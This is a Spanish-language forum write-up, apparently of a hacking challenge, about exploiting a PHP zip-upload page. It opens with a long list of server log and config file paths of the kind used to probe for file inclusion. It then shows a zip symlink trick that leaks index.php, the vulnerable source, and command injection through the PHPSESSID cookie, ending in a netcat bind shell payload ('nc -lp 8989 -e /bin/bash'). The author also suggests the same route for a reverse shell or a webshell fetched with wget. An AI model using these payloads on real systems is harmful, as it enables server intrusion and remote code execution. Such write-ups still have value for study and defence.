/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/log
/var/apache/logs
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/log/access_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/error_log
/web/conf/php.ini
/www/logs/proftpd.system.log
c:\NetServer\bin\stable\apache\php.ini
c:\PHP\php.ini
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\apache\logs\access.log
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\error.log
c:\apache\php\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\php4\php.ini
c:\php5\php.ini
c:\php\php.ini
c:\xampp\apache\bin\php.ini
Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php

Ahi consegui el source:
Code: You are not allowed to view links. Register or Login
ln -s "/var/www/html/index.php" prueba54
zip --symlinks prueba1.zip prueba54

Code: You are not allowed to view links. Register or Login
<!DOCTYPE html5>
<head>
    <meta charset="utf-8"/>
    <title>Sube tu archivo aquí</title>
</head>

<body>
    <form action="?page=upload" method="post" enctype="multipart/form-data">
        <input type="file" name="file"/>
        <input type="submit" value="kuankear!"/>
    </form>


<?php
    session_start
();
    
$allowed = array('zip');
    
$filename $_FILES['file']['name'];
    
$ext pathinfo($filenamePATHINFO_EXTENSION);
    if (!
in_array($ext$allowed)) {
        die(
"La extensión del archivo no es admisible.");
    }
    
$tmp_file "/tmp/" session_id();
    
$zip = new ZipArchive;
    
$zip->open($_FILES['file']['name']);
    
$zip->extractTo($tmp_file);
    
exec('unzip -o ' $_FILES['file']['tmp_name'] . ' -d ' $tmp_file);
    echo 
"Contenido del ZIP:<br>";
    
passthru("cat $tmp_file/* 2>&1");
    
exec("rm -rf $tmp_file");
    
?>



</body>
</html>

Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)

La parte importante:
Code: You are not allowed to view links. Register or Login
    session_start();
    $tmp_file = "/tmp/" . session_id();
    passthru("cat $tmp_file/* 2>&1");

Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Quote
0g4clkinm90tfeukeferus7en0asd$(id)
Y entre un monton de errores se ve esto:

Code: You are not allowed to view links. Register or Login
Contenido del ZIP:<br>cat: /tmp/0g4clkinm90tfeukeferus7en0asduid=33(http): Is a directory
cat: gid=33(http): No such file or directory
cat: groups=33(http)/*: No such file or directory

Trate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: You are not allowed to view links. Register or Login
Me quedó esta cookie:
Code: You are not allowed to view links. Register or Login
qur0v0rjnj840jju8qn1qpdjd3q$({nc,-lp,8989,-e,/bin/bash})Y ahi me pude conectar a una shell remota

A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget


Me diverti bastante, me gustó que no haya que adivinar cosas
Contacto: @migueljimeno96 -